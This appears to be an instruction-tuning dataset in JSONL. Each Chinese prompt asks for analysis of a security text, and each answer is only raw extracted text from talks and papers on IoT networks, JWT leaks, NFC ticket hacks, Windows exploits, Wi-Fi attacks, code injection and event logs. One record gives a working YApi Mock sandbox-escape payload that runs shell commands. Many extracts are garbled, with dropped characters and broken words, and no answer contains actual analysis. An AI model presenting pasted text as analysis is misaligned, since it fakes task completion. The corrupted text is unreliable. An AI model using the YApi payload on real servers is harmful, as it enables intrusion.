{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n看了看硬盘下载的很多markdwonpdfppt的资料如果能对它们进全搜索的话不就相当于是个 的知识库吗ES太重了周末研究了下做了个玩具级别的全索引特点是轻量和占有资源只 运个exe就 索引持本docxppt格式pdf格式暂时不持没找到go解析pdf好的库 些技术细节的碎碎念全索引的原理就是建个 倒排索引 索引的时候建倒排表查询的时候根据倒排表 的数据做合并打分排序操作再输出结果温习了很多在学校时的数据结构在这个时候来找我在当年下的 债了源码开源这个源码还有很多可以优化的地能够进步提升速度 使 使很简单就两步先建索引后进查询 索引 索引指定录 ./fulltext index -h 建索引 Usage: fulltext-cli index [flags] Flags: --data string 要索引的录 --ext stringArray 指定的索引后缀 (default [txt,md,yaml,ppt,docx,doc,pptx]) -h, --help help for index ./fulltext index --data /Users/boyhack/Downloads/ 查询 如果要输出内容可以加上 --show-content 参数 后续todo 持pdf索引持图ocr索引 展示内容能亮显示 打分机制bm25临近距离算法 集成 持多种查询语法 优化内存占索引体积查询速度 ./fulltext search nuclei ./fulltext search nuclei --show-content", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 企业家庭智能家居安全解决案 设计背景 智能家居品牌选择与途 络架构设想图 拓扑图实现效果 关于IOT设备的漏洞 autor枕边亮 随着IOT技术的发展智能家居逐渐普及化前的智能家居案也含盖了很多如智能中控智能 禁智能灯光系统智能窗帘系统智能家电控制系统智能暖通系统智能安防系统智能影甚 拓展到了智能晾智能厨电等等随着IOT设备的增多对宽带路由器要求逐渐提升部分低端路由 器与关设备法满量设备的承载与连接同时物联设备安全没有引起明显重视安全问题层出不 穷于是尝试部署后于是有了这篇解决案 前我较推荐的品牌有homekit超级智慧家艾特智能等等部分家智能家居体系完整 并且兼容其他第三设备对于型企业来讲需要到智能家居的地如公司活区禁中央空调 等等以及些主打智能家居的连锁酒店对于家庭覆盖可以达到某个家电器 以为例可以兼容的第三IOT设备上百家 设计背景 智能家居品牌选择与途 3 4 络架构设想图 5 智能家居络架构设想图 1. 关于光猫 前电信的光猫型号众多基本上都是千兆光猫此时只需要关注光猫后的接部分光猫是全千兆接 部分只有1个是千兆接如果宽带超过100mbps就需要注意线不能插在百兆上可以使交换 机拓展千兆还需要注意的是光猫后有个IPTV是于电视的这个不能插错参考下图 6 电信光猫接示意图 2. 关于络设备防墙关路由器 家庭使可以直接购买控机或者三合的路由器最好是端路由建议华硕或者件的端家型 号如果采控机三合建议采2H2G及以上的配置系统刷为openwrtikuairoslede等系 统具备了关防墙路由的功能 7 openwrt 家级产品配置 控机性能的三合产品 安装openwrtikuai等系统时需要注意单独配置后再接光猫lan1不能设置为192.168.1.1不然会与 光猫IP产冲突具体IP划分可以决定提前在系统上划分路由或者vlan 如果是光猫拨号wan需要设置为DHCP动态获取 8 如果是企业使建议三者分开为三个单独的络设备以具备更强的性能根据企业规模设备数 量络环境购置千兆甚万兆络设备 9 企业级产品 3. 关于AP的选择 10 AP的选择家级可以采华硕件的中端型号可以承载更多的设备并保证络的稳定性普通的家 路由器经常会出现断流的情况 华硕路由器 企业级户般采端的H3C型号与件等等具备更强的承载能 这的AP有两种选择可以为NAT模式可以为AP 采NAT模式安全性会更强点AP也可以划分VLAN服务器与WIFI单独的段访客WIFI单独的段 等等确保定的隔离 4. 其他设备 服务器可以采exsi在exsi的基础上部署其他服务如内态势感知内资产管理弱点扫描等 有很多开源的解决案可以选择 我的IPTV是直接接的是电视机中间没有任何设备 IOT关是单独接在路由器下的是单独的VLAN确保安全性IOT关主要控制智能家居IOT的部分 品牌关也有物联卡可以直接访问相应的智能家居云服务通过机APP控制智能设备也可以通过 互联出络连接家庭智能家居云服务 企业与家庭物联可以采类似这样的解决案 5. 内安全性 家庭户可以直接采虚拟化的式部署些开源安全产品于监测络漏洞扫描资产管理 企业级户采企业级的防墙态势感知WAF等等段于内防护 拓扑图实现效果 11 流量监测 三合设备资源占情况 线路监控 12 协议监控 ACL按照需求设置 访客络路由器带 30个物联设备+3个传感器 13 关控制的设备 相于传统安全IOT的设备漏洞主要出现在不安全的配置固件安全问题APP端越权等等特别是些 商的IOT设备存在诸多的安全问题在内环境中做好物联设备的隔离与基线控制可以确保定的 安全性 关于IOT设备的漏洞", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# YApi Registration and Mock Remote Code Execution [中文版本(Chinese version)](README.zh-cn.md) YApi is a API management tool developed by Node.JS. If registration of the YApi server is enabled, attackers will be able to execute arbitrary Javascript code in the Mock page. References: - <https://paper.seebug.org/1639/> - <https://www.freebuf.com/vuls/279967.html> ## Vulnerability Environment Execute following command to start a YApi server 1.9.2: ``` docker compose up -d ``` After the server is started, browse the `http://localhost:3000` to see the index page of the YApi. ## Vulnerability Reproduce Register a normal user then create a project and an interface: ![](1.png) ![](2.png) There is a \"Mock Tab\" that you can input JavaScript code, put the evil code into textarea: ``` const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor('return process') const process = myfun() mockJson = process.mainModule.require(\"child_process\").execSync(\"id;uname -a;pwd\").toString() ``` ![](3.png) Then, go back to the preview tab and see the Mock URL: ![](4.png) Open that URL, Mock script is executed and you can see the output: ![](5.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .TH \"SYSCTL\\&.D\" \"5\" \"\" \"systemd 231\" \"sysctl.d\" .\\\" ----------------------------------------------------------------- .\\\" * Define some portability stuff .\\\" ----------------------------------------------------------------- .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\\\" http://bugs.debian.org/507673 .\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \\n(.g .ds Aq \\(aq .el .ds Aq ' .\\\" ----------------------------------------------------------------- .\\\" * set default formatting .\\\" ----------------------------------------------------------------- .\\\" disable hyphenation .nh .\\\" disable justification (adjust text to left margin only) .ad l .\\\" ----------------------------------------------------------------- .\\\" * MAIN CONTENT STARTS HERE * .\\\" ----------------------------------------------------------------- .SH \"NAME\" sysctl.d \\- 在启动时配置内核参数 .SH \"SYNOPSIS\" .PP /etc/sysctl\\&.d/*\\&.conf .PP /run/sysctl\\&.d/*\\&.conf .PP /usr/lib/sysctl\\&.d/*\\&.conf .SH \"描述\" .PP 在系统启动时 \\fBsystemd-sysctl.service\\fR(8) 根据上面列出的配置文件设置 \\m[blue]\\fBsysctl(8)\\fR\\m[]\\&\\s-2\\u[1]\\d\\s+2 内核参数 .SH \"配置文件格式\" .PP 配置文件的格式是 一系列\"KEY=VALUE\"行(每行一对) 空行以及以 \"#\" 或 \";\" 开头的行都将被忽略 .PP 注意在KEY内部可以使用 \"/\" 或 \"\\&.\" 作为分隔符 如果第一个分隔符是 \"/\"  那么其余的分隔符将保持原样 如果第一个分隔符是 \"\\&.\" 那么互换所有的 \"/\" 与 \"\\&.\"  例如\"kernel\\&.domainname=foo\" 等价于 \"kernel/domainname=foo\" 都会将 \"foo\" 写入 /proc/sys/kernel/domainname 参数中 同样的\"net\\&.ipv4\\&.conf\\&.enp3s0/200\\&.forwarding\" 等价于 \"net/ipv4/conf/enp3s0\\&.200/forwarding\"  都是指 /proc/sys/net/ipv4/conf/enp3s0\\&.200/forwarding 参数 .PP sysctl\\&.d/ 中的设置将在系统启动的早期被应用 针对网络接口的配置 则会在对应的网络接口出现的时候被应用 具体说来就是 net\\&.ipv4\\&.conf\\&.*, net\\&.ipv6\\&.conf\\&.*, net\\&.ipv4\\&.neigh\\&.*, net\\&.ipv6\\&.neigh\\&.* 参数 .PP 许多 sysctl 参数仅在加载相应的内核模块之后才可用 因为内核模块是按需动态加载的 (例如在插入新硬件或启动网络时) 所以在系统启动早期运行的 \\fBsystemd-sysctl.service\\fR(8) 无法设置那些依赖于特定内核模块的参数 对于这些参数 首选的方法是通过 \\fBudev\\fR(7) 规则来设置 次选的方法是将这些模块添加到 \\fBmodules-load.d\\fR(5) 中 因为 \\fB", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCracking Cryptocurrency Brainwallets Ryan Castellucci DRAFT SLIDES, WILL BE REVISED! FOR FINAL VERSION AFTER TALK https://rya.nc/dc23 Disclaimer Stealing from people with weak passphrases isnt nice. Dont be an asshole. Whats a cryptocurrency?  Bitcoin is the most widely known example.  Electronic money which can operate without banks or governments  Secured with cryptographic algorithms  Transferred via a sort of electronic check  Checks are made public to prevent bounces  Control of key == Control of money Whats a brainwallet?  A brainwallet is a cryptocurrency key that is created from a password (or passphrase)  Some people believe that this will make their money harder to steal (or seize)  Knowledge of password == Control of money   Sending money to a brainwallet publishes a hash of it. What if the hash can be cracked? It seemed like it might be interesting  Came across a blog post about brainwallets  The author made some and posted about it to see how long theyd take to crack  I figured writing a cracker would be a fun way to spend my commute for a few days  But why try to crack three brainwallets when you can try to crack all of them? My first brainwallet cracker  Simple design, pass a file with pubkeyhashs, then pipe words/phrases on STDIN  Written in C using OpenSSLs crypto  ~10,000 passwords per second on my PC  The slowest part, by far, is turning the private key into a public key. More on that later. Taking it for a spin  I start feeding it password cracking wordlists  Find some tiny amounts of money  Scrape wikiquote and a few other sites to build myself a phraselist  Run the phraselist - it gets some hits after a few hours  Pull balances, see one with 250BTC Well, that is interesting. Now what?  250BTC was worth about $15k  I wanted to fix this. Im friends with Dan Kaminsky. Hes fixed some big things. After regaining my composure, I called him.  As luck would have it, he was in town  We meet up about an hour later to figure out how to do the right thing ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 APISIX CVE-OLOO-OXOTT 漏洞分析与复现 漏洞描述 影响版本 前要介绍 APISIX JWT 漏洞分析 环境搭建 漏洞复现 漏洞代码修复 修复案 总结 CVE-2022-29266 这个漏洞已经出现有些时间了正好现在有时间上也出现了不少分析章今 天来看看这个漏洞 在 2.13.1 之前的 Apache APISIX 中由于 APISIX 中的 jwt-auth 插件依赖于 lua-resty-jwt 库在 lua-resty-jwt 库返回的错误信息中可能会包含 JWT 的 sceret 值因此对于开启了 jwt-auth 插件的 APISIX 存在 JWT sceret 的泄露从造成对 JWT 的伪造险 低于 2.13.1 的 Apache APISIX 全部版本 Apache APISIX 是个由 Apache 基会孵化的个开源的云原 API 关具有性能可扩展的特 点与传统的 API 关相APISIX 是通过插件的形式来提供负载均衡志记录身份鉴权流量控 制等功能 漏洞描述 影响版本 前要介绍 APISIX 2 JSON Web Token 缩写成 JWT常被于和服务器的认证场景中这点有点类似于 Cookie 的 Session id JWT 持 HS256RS256RS512 等等算法JWT 由三部分构成分别为 Header头部 Payload负载Signature签名三者以数点分割 JWT 的第三部分 Signature 是对 Header 和 Payload 部分的签名起到防数据篡改的作如果知道 了 Signature 内容那么就可以伪造 JWT 了 JWT 的格式类似于这样 实际遇到的 JWT 般是这种样 先根据官仓库的漏洞修复代码定位到 /apisix/plugins/jwt-auth.lua 件的第 364 如果 JWT  效则在 return 返回 401 并给出效的原因即 jwt_obj.reason JWT 漏洞分析 Plain Text 复制代码 Header.Payload.Signature 1 Plain Text 复制代码 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6 IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV _adQssw5c 1 3 接着在 lua-resty-jwt 库中找到 lib/resty/jwt.lua 件在 jwt.lua 件的 782 中可以看到有个 jwt_obj.reason 中包含了 secret这代码的意思是说如果程序执正常就返回 secret 的值否则 就返回具体的异常信息 那么接下来要做的就是怎么样构建 payload 才能让代码进到第 782 从让 jwt_obj.reason 返回 我们想要的 secret 呢那么就要看看 782 上的代码 .. 表示字符串拼接即把后代码的值拼接到字符串中 err and err or secret 所表示的意思是如果 err 为 nil则返回 secret 的值否则返回 err 4 通过上图可以看到如果想执到第 782 需要满四个条件分别如下 756 JWT 的算法需要是 RS256 或者 RS512 758 trusted_certs_file 值需要为 nil 774 secret 值不能为 nil 781 cert 的值需要为 nil 或者 false 先第个条件JWT 的算法需要是 RS256 或者 RS512这个很简单只需要 JWT 的 header 部分 的 alg 参数为 RS256 或者 RS512 即可 接着第个条件trusted_certs_file 即信任证书件APISIX 默认算法是 HS256 HS256 和 HS512 不持这种证书件的式因此只要我们使 HS256 或者 HS512 算法就了     ~= 表示不等于 5 然后第三个条件secret 值不能为 nil当 APISIX 使 jwt-auth 插件的时候如果使的默认算 法就需要指定 secret 的值那么这个 secret 的值就不会是 nil 了 最后第四个条件cert 的值需要为 nil 或者 false在 776  779 的代码中可以看到会判断 secret 中有没有 CERTIFICATE 和 PUBLIC KEY如果有那么 cert 就不会是 nil 了那么也就是说只 要 secret 中没有 CERTIFICATE 和 PUBLIC KEY代码就会执到第 782 并且返回 secret 的值 所以分析", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWho we are  bughardy (aka Matteo Beccaro) bughardy@cryptolab.net Italian student with passion of IT, networking and pentesting. In 2013 ended his studies in high school and apply for Politecnico of Turin at Computer Engineering.  Eagle1753 (aka Matteo Collura) eagle1753@onenetbeyond.org Italian student, applied for Politecnico of Turin, Electronic Engineering. Has a great passion for Physics. He is studying with bughardy on WiFi networks and security. Loves to solve challenges. History of NFC hacks  2008 NFC MIFARE CLASSIC exploit, further in following years.  2011 first hack of NFC ULTRALIGHT transport system by U.S. researchers using the RESET ATTACK  2013 a new hack of NFC ULTRALIGHT transport system made by us. We called it LOCK ATTACK. What is MIFARE chip? RFID chip designed to work at 13.56MHz.There are millions of MIFARE chip cards worldwide and they belong to several variants:  MIFARE CLASSIC  MIFARE ULTRALIGHT  MIFARE ULTRALIGHT C  MIFARE DESFIRE  etc The history of an hack  First tests, without knowing how OTP was working.  OTP contains the number of rides left!!  Attempt to write something over OTP. There is still a long way  One the roa.. Er.. On the bus test!  Stamping more tickets one after the other and looking and comparing their dumps  Empiric results about how data is stored on tickets Seize the day  Assume that you know where the time (of the last stamp) is stored and how  Use a NFC phone / NFC reader to change that field (it is in the data field so there are no problems)  It isnt so reliable and now we arent able to deal with this. Mission Completed  Preventing the machine to write the number of rides left would turn the ticket into an unlimited one.  The answer is: LOCK BYTES Yes, but what is MIFARE ULTRALIGHT? How is it composed? Page Address Byte number Decimal Hex 0 1 2 3 0 0x00 UID 1 0x01 UID 2 0x02 UID INTERNAL LOCK BYTE LOCK BYTE 3 0x03 OTP OTP OTP OTP 4 to 15 0x04 to 0x0F DATA What is OTP?  Only security function in MIFARE ULTRALIGHT tick", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage com.example; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer; import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer; import org.springframework.web.bind.annotation.RestController; @SpringBootApplication @RestController @EnableResourceServer @EnableAuthorizationServer public class DemoApplication { public static void main(String[] args) { SpringApplication.run(DemoApplication.class, args); } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n基于历史行为的异常检测 O365怎样反击内部恶意攻击 Lei He Principal Engineering Manager, Microsoft Corporation 2019-05-30 Office365安全要求 * 客户密码箱入门只能用于访问客户数据的企业服务.  无法使用Corp身份进行解密或访问 所有访问要求2FA  背景调查及安全培训  用户数据和运作中心隔离  零永久访问权限  客户密码箱和BYOK  基于ETW的详细原始遥测技术能够在 <1天内测量新的遥测技术  集中处理会在15分钟内发出警报以解 决安全问题  每天至少1次攻击模拟服务以验证监视/ 响应  能够在<15分钟内触发安全响应工作流 程并在<1天内检测新工作流程  所有秘密必须存放在安全的容器中  秘密永远不应该离开边界  暴露时应立即滚动秘密  数据受托人应该在更新环境中完全控制 秘密  每天都扫描所有产品终点  所有中等和更严重评级的漏洞都应该打 补丁或免除  所有网络应用程序应每月扫描一次  中央报告和跟踪 访问控制 安全监控 密钥管理 反病毒修补 概览 问题  信息泄露/心怀不满的恶意内部人员是重大的安全威胁  经过监督的ML检测训练以检测已知模式; 需要覆盖未知模式 解决方案  基于历史行为的检测标记异常活动  对于O365数据中心安全用户== DevOps  可以推广到其他实体配置文件 O365 数据中心监控 自动近实时多层检测和响应 Vanquish监测管道 O100K机器评估 O1k用户评估 Spark上的近实时NRT多层处理 <15分钟内的寻呼警报包括基于ML 的警报 分析工具和仪表板 在收到警报时以近乎实时的方式交互 式查看结果 警报和自动化 24 x 7寻呼警报和自动响应 模型特征选择 观察DevOps活动展示模式 登录活动  用户从哪里登录  用户什么时候登录  用户登录后做了什么 及时提升  用户请求了什么类型的权限提升  谁批准了权限提升 操作  用户执行了哪个工作流程  用户启动了哪些进程  用户触发了哪些检测 特征  登录的机器  机器类型  容量单位范围  登录的IP  连接到的IP  其他检测触发  提升到何种权限  提升目的  批准者  特定的时间  流程和工作流程 模型 1. 产生每个用户的完整历史行为总结 a) 每个要素都是{ Value: Occurrence }的列表 2. 每隔2分钟评估用户过去6个小时活动行为 3. 将每个当前的活动行为与用户的历史活动行为进行比较 a) 针对会话中的值计算特征相似性得分 历史上发生的越高越相似/正常 b) 根据n个特征的相似性得分生成会话异常分数 4. 收集历史事件测试数据集以评估性能 5. 根据警报次数容忍度来设置警报阈值每周5次 Model Tuning Workflow Malicious != Anomalous 模型调优 Was this corroborated? Email User in Alert Start Label False Positive Improve Model Was the activities abnormal? Label True Positive End No Yes No Yes 模型调优模式 新团队成员 设置活动量的最低阈值 稀疏功能 设置有效功能的最低阈值 双重计数 删除自动生成的活动 换队伍 使用团队资料 重命名命令 不区分大小写的比较 高熵特点 用{Capacity Unit, Capacity Type}替换目标计算机 名称或IP 降低用户源IP的权重 降级自由文本功能 比如提升权限  模型性能 成功指标警报次数  自2018年末发布以来每周平均提供约5次警报 成功指标精确度  ~90真阳性上个月16/18 真实积极的类型  渗透测试  一次性事件破碎玻璃或审计  操作流程违规  DevOps 不良行为  DevOps一次性测试或试验 行动起来 应用基于历史行为的异常检测深度防御  从高质量数据开始  找到真实的恶意事件  做在线实施前首先执行离线分析  通过反馈循环持续调整  可解释的模型  警报有足够的补充信息 答疑 基于历史行为的异常检测 www.linkedin.com/in/lei-he-security Lei He leih@Microsoft.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n请谨慎编码哪怕它只是一句错误处理 wang yu Hacks in Taiwan, 2013  来自 win32k ! EPATHOBJ::pprFlattenRec 漏洞的启示 议题简介 第一部分 议题简介 关于作者 ( wangyu@360.cn ) 议题背景 2013 年 3 月 Tavis Ormandy 前辈披露了一个微 软win32k 模块的问题  在内存压力测试的情况 下例程 win32k!EPATHOBJ::bFlatten 发生了蓝屏 接下来关于该蓝屏的利用可谓是一波三折5 月随着对链表关系的深度分析蓝屏问题终于上升 为本地提权问题exploit-db 对此问题的关注度激 增 本议题将聚焦于 win32k!EPATHOBJ 子系统数据 结构的设计与实现以白盒的视角审视上述提权漏洞 的原理及利用细节 议题简介 议题涵盖 - win32k!EPATHOBJ 子系统相关数据结构的背景设计 与实现 - win32k!EPATHOBJ::pprFlattenRec 漏洞 ( CVE-2013- 3660 ) 的产生原因及几种可行的修复方案 - CVE-2013-3660 任意地址写入漏洞的利用思路及演进 过程 - 漏洞给我们带来的思考与启示 - 更多测试与审计 责任声明 PATH 子系统设计背景与数据结构 第二部分 让我们从这里开始 ...... EPATHOBJ::pprFlattenRec() is an internal routine for applying this process to a linked list of PATHRECORD objects. If you follow the logic, you can see that the PATHRECORD object retrieved from newpathrec() is mostly initialized, but with one obvious error: EPATHOBJ::pprFlattenRec(_PATHRECORD *)+33: .text:BFA122CD mov eax, [esi+PATHRECORD.prev] ; load old prev .text:BFA122D0 push edi .text:BFA122D1 mov edi, [ebp+new] ; get the new PATHRECORD .text:BFA122D4 mov [edi+PATHRECORD.prev], eax (1) ; copy prev pointer over .text:BFA122D7 lea eax, [edi+PATHRECORD.count] ; save address of count member .text:BFA122DA xor edx, edx ; set count to zero .text:BFA122DC mov [eax], edx (2) .text:BFA122DE mov ecx, [esi+PATHRECORD.flags] ; load flags .text:BFA122E1 and ecx, 0FFFFFFEFh ; clear bezier flag .text:BFA122E4 mov [edi+PATHRECORD.flags], ecx (3) ; copy old flags over The next pointer is never initialized! ......  Tavis Ormandy 上下文中 next 指针是什么未初始化意味着什么 (4) 吾将上下而求索  PATH 子系统 Windows 图形子系统绘制直线或曲线至少需要哪些要素让 我们从面向对象的角度想想 颜色宽度样式(像素)点的坐标点的类型 ...... Windows 图形子系统是怎么做的 The GDI pen objects manage pens. The device context objects manage other line and curve drawing attributes. Now we need something to manage geometric shapes. This brings us to the GDI path objects.  Feng Yuan GDI path objects  坐标点与属性集合的管理者 吾将上下而求索  PATH 子系统 The Win32 API does not provide any functions to create PATH_TYPE objects directly, althoug", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWifi Hacking DEFCON China 1.0 2019 This presentation at http://bit.ly/2LeM0U3 > whoarewe // Philippe Delteil // @philippedelteil CS. Engineer@University of Chile Self proclaimed hacker 1st talk at Defcon 26 Skytalks \"Macabre stories of a hacker in the public health sector\" Hacked over 3,000 wifi routers of Brazil's biggest ISP. Classes for free: CTF, pentesting, programming, basic computer knowledge. In a Free and Open University. Founded a company with a very clever name: Info-sec. > whoarewe //Guillermo Pilleux // @Llipi B.Sc. CS@University of Chile Scrappers/crawlers  retrieved 500k Chilean names on genealog.cl Research on HTR for Opticality in Guatemala Cybersecurity  2nd internship in Info-Sec  This Workshop > Introduction: Very brief history of Wifi '97 creation of 802.11  IEEE802.11 '99  WEP 2001  WEP exploits 2003  WPA 2004  WPA2  IEEE 802.11i 2006  WPS 2011  WPS vulns 2017  WPA2 vulns (KRACK) 2018  WPA3 2019  5 vulns WPA3 > Wifi: How does it work? Radio waves transmission Radio signal  router Router  decodes the signal  Ethernet connection Two-way traffic Data from Internet  router  radio signal  machine's wireless adapter. > Wifi: How does it work? > Lab Preps: VM install 1. Pendrives with persistent Kali Linux Slow machines || Not enough RAM || Small HDD 2. Host + VirtualBox 5.2.18 + Kali VM Get your flavour https://bit.ly/2xHsHcI VirtualBox Guest Additions installed? How to install it Windows https://bit.ly/2ZL6Nln Linux https://bit.ly/2J5wWVU +sudo usermod -a -G vboxusers $USER > Lab Preps: Wireless Adapter Alfa AWUS036NHA OS Hosts Install Drivers Windows Windows 8/10 Windows 7/Vista/XP MacOS 10.13/10.12 Linux rtl8812au > Lab Preps: Know your victims! Cheapest Wifi router ~US$20 Includes: WEP WPS WPA/WPA2 > Lab Preps: VM configurations Wireless Card Configuration Adapter will be named wlan0, wlan1,.., wlanN Avoid adapter with names difficult to remember > sudo sed -i 's/GRUB_CMDLINE_LINUX=\\\"\"/GRUB_CMDLINE_LINUX=\\\"net.ifn ames=0 biosdevname=0\\\"/' /etc/de", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBy Alon Weinberg Please inject-me, a x64 code injection August 2019 Im a Security researcher! Ive been working at Deep Instinct, Since 2017 And I was in the IDF Cyber Unit for 4.5 years Alon Weinberg Please inject-me a x64 code injection Intro  Code injection and its importance  Introducing Inject-Me Technical background  ReadProcessMemory  X64 WinAPI calling convention Inject-Me - Detailed flow  Abusing ReadProcessMemory  Copying data on the target process  Finalizing the injection  Infinite running thread  Execution  Demo 4 Intro Please inject-me, a x64 code injection 5 Code injection is the general term of introducing (or \"injecting\") code into a process and executing it from the process context. Injecting process target process Inject code MessageBox code Execute code What is code injection 6 Why is code injection important? Benign use of code injection  Security solutions  Adding functionality  Monitoring, Analysis and Research 7 Malicious use of code injection:  Stealth - Hiding malware presence  Evasion - Bypassing security solutions  Stealing information from another process Introducing inject-me  How it all started  A new code injection for x64  The idea behind Inject-Me  Injection-less code injection 8 Technical background Please inject-me, a x64 code injection 9  Reads memory from a process By running the function remotely in a target process, and controlling the parameters passed using SetThreadContext one can read\\inject a shellcode into the target process. ReadProcessMemoryfunction 10  Integer arguments passed in registers RCX, RDX, R8, and R9  Arguments after the fourth argument passed on the stack  Function can be set with four or less arguments remotely using SetThreadContext hProcess lpBaseAddress lpBuffer nSize lpNumberOfBytesRead ReadProcessMemory RCX = RDX = R8 = R9 = RtlExitUserThread 0x00000000 0x00000000 0x00000000 0x00000000 Stack lpNumberOfBytesRead Return Address= Ignored Ignored Ignored Ignored On stack X64 WinAPIcalling convention 11 Det", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nw w w .ianange ll.co m Co m ple xity in Co m pute r Syste m s: a Risky Busine ss Pro fe sso r Ian O. Ange ll Info rm atio n Syste m s and Inno vatio n Gro up De partm e nt o f Manage m e nt Lo ndo n Scho o l o f Eco no m ics w w w .ianange ll.co m Why do w e ne e d Te chno lo gy at all? Te chno lo gy transfo rm s unce rtainty into risk. We e xplain, and the re by sw ap ho pe le ssne ss, fo r the o ptim ism in a plan o f actio n. In o the r w o rds w e im po se structure in o rde r to gain a te nuo us handle o n unce rtainty. w w w .ianange ll.co m (num e rical) Algo rithm s + Pe o ple = (syste m ic) Risk = Hazard + Oppo rtunity Managing Unce rtainty? w w w .ianange ll.co m Managing Unce rtainty? Tho ugh this be m adne ss, ye t the re is m e tho d int (Ham le t, Act II, Sce ne 2 ) Me tho d is the first, the last, the o nly re so rt o f the m e dio cre w w w .ianange ll.co m De finitio n o f a Singularity: De finitio n o f a Singularity: the y had to be lucky all the tim e , w e had to be lucky just o nce  (IRA spo ke sm an afte r the Brighto n bo m bing, w he n the y alm o st kille d Margare t Thatche r) w w w .ianange ll.co m Go o dharts Law any o bse rve d statistical re gularity w ill te nd to co llapse o nce pre ssure is place d o n it fo r co ntro l purpo se s w w w .ianange ll.co m Be yo nd Go o d and e -Ville Be yo nd Go o d and e -Ville Lo o k to w ard the o bse rvable co nse que ntial risks Lo o k to w ard the o bse rvable co nse que ntial risks that o ccur w he n co m pute rs are inte grate d that o ccur w he n co m pute rs are inte grate d into into Hum an Activity Syste m s Hum an Activity Syste m s w w w .ianange ll.co m Co m pute rs de al w ith o bje ctive w e ll-structure d pro ble m s, w ith de tail. The y canno t co pe w ith subje ctive subtle ty, am biguity and co m ple xity w w w .ianange ll.co m A go o d te chno lo gy platfo rm , altho ugh ne ce ssary, is no t sufficie nt fo r succe ss. Succe ss o r failure w ith a te chno lo gy w ill be de te rm ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 日志 <p align=\"center\"> <img src=\"../../../../assets/img/banner/windows日志.png\" width=\"90%\"> </p> --- ## 前言 在 windows 系统的运行过程中会不断记录日志信息根据种类可以分为windows日志(事件日志)应用程序及服务日志,这些日志信息在取证和溯源中非常重要 **审核策略** Windows Server 2008 R2 系统的审核功能在默认状态下并没有启用 建议开启审核策略若日后系统出现故障安全事故则可以查看系统的日志文件排除故障追查入侵者的信息等 开始 --> 管理工具 --> 本地安全策略 --> 本地策略 --> 审核策略 **事件查看** 开始-运行输入 `eventvwr.msc` 打开事件查看器查看日志 可以看到事件查看器将日志分成了2大类windows日志应用程序和服务日志windows日志中又有应用程序安全setup系统forwarded event这几种事件类型 --- ## 事件日志 Windows事件日志文件实际上是以特定的数据结构的方式存储内容其中包括有关系统安全应用程序的记录每个记录事件的数据结构中包含了9个元素可以理解成数据库中的字段日期/时间事件类型用户计算机事件 ID来源类别描述数据等信息运维人员可以根据日志取证了解计算机所发生的具体行为 --- ### 事件级别 在事件日志中有5个事件级别 * 信息 信息事件指应用程序驱动程序或服务的成功操作的事件 * 警告 警告事件指不是直接的主要的但是会导致将来发生问题的事件例如当磁盘空间不足或未找到打印机时都会记录一个警告事件 * 错误 错误事件指用户须知道的重要的问题通常包括功能和数据的丢失例如,如果一个服务不能作为系统引导被加载那么它将会产生一个错误事件 * 成功审核 成功的审核安全访问尝试主要是指安全性日志这里记录着用户登录/注销对象访问特权使用账户管理策略更改详细跟踪目录服务访问账户登录等事件例如所有的成功登录系统都会被记录为 成功审核事件 * 失败审核 失败的审核安全登录尝试例如用户试图访问网络驱动器失败则该尝试会被作为失败审核事件记录下来 --- ### 事件ID Windows事件日志中记录的信息中关键的要素包含事件级别记录时间事件来源事件ID事件描述涉及的用户计算机操作代码及任务类别等 Windows 的日志以事件 id 来标识具体发生的动作行为可通过下列网站查询具体 id 对应的操作 - https://docs.microsoft.com/en-us/windows/security/threat-protection/ 直接搜索 event + 相应的事件id 即可 - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx?i=j |事件 ID | 说明 | | - | - | | 1102 | 清理审计日志 | | 4624 | 账号成功登录 | | 4625 | 账号登录失败 | | 4768 | Kerberos 身份验证TGT 请求 | | 4769 | Kerberos 服务票证请求 | | 4776 | NTLM 身份验证 | | 4672 | 授予特殊权限 | | 4720 | 创建用户 | 